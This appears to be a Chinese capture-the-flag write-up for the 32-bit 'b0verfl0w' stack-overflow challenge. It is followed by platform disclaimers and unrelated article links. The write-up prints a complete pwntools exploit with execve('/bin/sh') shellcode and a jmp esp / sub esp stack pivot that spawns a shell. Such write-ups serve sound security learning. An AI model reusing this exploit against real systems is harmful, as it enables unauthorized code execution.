b0verfl0w

先checksec 一波,32位,啥都沒開

image.png

IDA分析,可以發(fā)現(xiàn)一個很明顯的棧溢出漏洞,但是細心點就會發(fā)現(xiàn)溢出的空間只有0x12有點小,很難構(gòu)造ROP鏈,由于沒有開啟NX,那是不是可以往s寫入shellcode然后返回到棧里執(zhí)行這段shellcode,找一下gadget

image.png

這是里有一個jmp esp那么接下來我們還需要執(zhí)行一段sub esp,0x28;jmp esp就可以返回到s的棧去執(zhí)行寫進去的shellcode

image.png

exp:

from pwn import *
p = process('./b0verflow')
context.log_level = 'debug'
shellcode_x86 = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode_x86 += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode_x86 += "\x0b\xcd\x80"
jmp_esp = 0x08048504
'''
sub esp,0x28
jmp esp
'''
sub_jmp_esp = asm('sub esp,0x28;jmp esp')
payload = shellcode_x86 + 'a'*(0x24-len(shellcode_x86)) + p32(jmp_esp) + sub_jmp_esp
# gdb.attach(p,"b *0x804857a")
# pause()
p.sendline(payload)
p.interactive()
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • b0verfl0w 32位elf文件,安全配置如下: 存在堆棧溢出漏洞,但是棧不大,只有0x38。 看了下exp,...
    clive0x閱讀 1,453評論 0 0
  • Return-Oriented-Programming(ROP FTW) Author: Saif El-Sher...
    RealSys閱讀 3,516評論 0 2
  • 30天人生記錄營創(chuàng)意寫作第26天 養(yǎng)老 01 養(yǎng)老,在古代似乎從來不是問題。 孟子說:“老吾老,以及人之老;幼吾幼...
    踏雪尋梅_2006閱讀 171評論 2 1
  • 為大家解讀《你值得過更好的生活》,一起徹底解脫! 1、徹底解脫后,你將再無敵人,同時,你不會再受環(huán)境的影響! 2、...
    抑郁者幸福家園閱讀 221評論 0 2
  • ?不是有互聯(lián)網(wǎng)才有互聯(lián)網(wǎng)思維。 ?開會時讓年輕人先講,再總結(jié)、提煉。 ?用戶與客戶的區(qū)別[如兒童玩具購買,安踏廣告...
    黃家小妞閱讀 354評論 0 0

友情鏈接更多精彩內(nèi)容